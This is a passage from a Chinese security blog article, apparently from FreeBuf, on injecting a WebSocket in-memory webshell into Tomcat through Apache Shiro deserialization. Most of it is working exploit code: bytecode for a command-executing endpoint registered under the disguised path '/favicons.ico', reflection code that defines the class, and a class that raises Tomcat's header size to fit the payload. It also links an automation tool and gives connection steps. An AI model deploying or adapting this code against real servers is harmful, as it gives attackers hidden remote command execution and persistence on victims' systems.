47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 0, 15, 58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};
try {
Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
method.setAccessible(true);
clazz = (Class) method.invoke(cl,bytes,0,bytes.length);//获取到字节码的Class
/*
获取当前的StandardContext
通过StandardContext获取ServerContainer
定义一个恶意类,并创建一个ServerEndpointConfig,给这个恶意类分配URI path
调用ServerContainer.addEndpoint方法,将创建的ServerEndpointConfig添加进去
*/
String urlPath = "/favicons.ico";
ServerEndpointConfig config = ServerEndpointConfig.Builder.create(clazz,urlPath).build();
WsServerContainer container = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName());
if(container.findMapping(urlPath)==null){
container.addEndpoint(config);
}
} catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
e.printStackTrace();
} catch (DeploymentException e) {
e.printStackTrace();
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
这里直接加载该类,并放到_bytecodes中,其实就是CC3链的前半部分,后面就是CB链的代码
最后在进行一下加密,这里就不用多说了吧
但是众所周知的一个问题就是,shiro的header长度检测,所以这里拿出师傅们的之前分享的代码,修改header头大小
package com;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {
static {
try {
java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
contextField.setAccessible(true);
headerSizeField.setAccessible(true);
serviceField.setAccessible(true);
requestField.setAccessible(true);
getHandlerMethod.setAccessible(true);
org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
for (int i = 0; i < connectors.length; i++) {
if (4 == connectors[i].getScheme().length()) {
org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
for (int j = 0; j < classes.length; j++) {
// org.apache.coyote.AbstractProtocol$ConnectionHandler
if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
globalField.setAccessible(true);
processorsField.setAccessible(true);
org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
for (int k = 0; k < list.size(); k++) {
org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
// 10000 为修改后的 headersize
headerSizeField.set(tempRequest.getInputBuffer(),409600000);
}
}
}
// 10000 为修改后的 headersize
((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(409600000);
}
}
}
} catch (Exception e) {
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}接着整理一下过程:修改headersize大小--->将CB链生成出来并进行一次加密
为了方便,本人就直接写成了小工具,大家可以自行研究,主要就是将前面本人所讲的,进行了一个自动化的利用
https://gitee.com/state123/shiro_-web-socket/tree/master
直接注入成功,此小工具包含了自动修改headersize,自动注入WebSocket内存马,当然肯定不能和专业工具比较,像一些其它的利用链,以及key的话,大家可以自行修改。
目前WebSocket内存马打入进去了,但是如何连接呢?
直接使用wscat工具即可,切记,这里的协议要由大家熟知的http://改为ws://
一些结尾话
如果没看过shiro漏洞的话,可以看本人之前的文章
https://www.freebuf.com/articles/web/331961.html
至于wscat可以自行在网上下载安装,该工具要依赖node.js环境,记得一并安装好
本文中本人提供了一款工具,此工具只供大家学习参考用!一切后果皆和本人无关!
如果看着实在太复杂,可以去看一下websocket内存马,在看完websocket内存马在学习shiro websocket内存马注入,其实差别不是很大
Met32
o.0
已在FreeBuf发表 16 篇文章
本文为 Met32 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
JAVA审计与安全
Met32 LV.4
o.0
- 16 文章数
- 29 关注者
针对某系统XXE漏洞分析
2024-02-22
一文读懂Xpath注入与利用
2023-12-18
剖析哥斯拉WebShell管理工具
2023-09-04
文章目录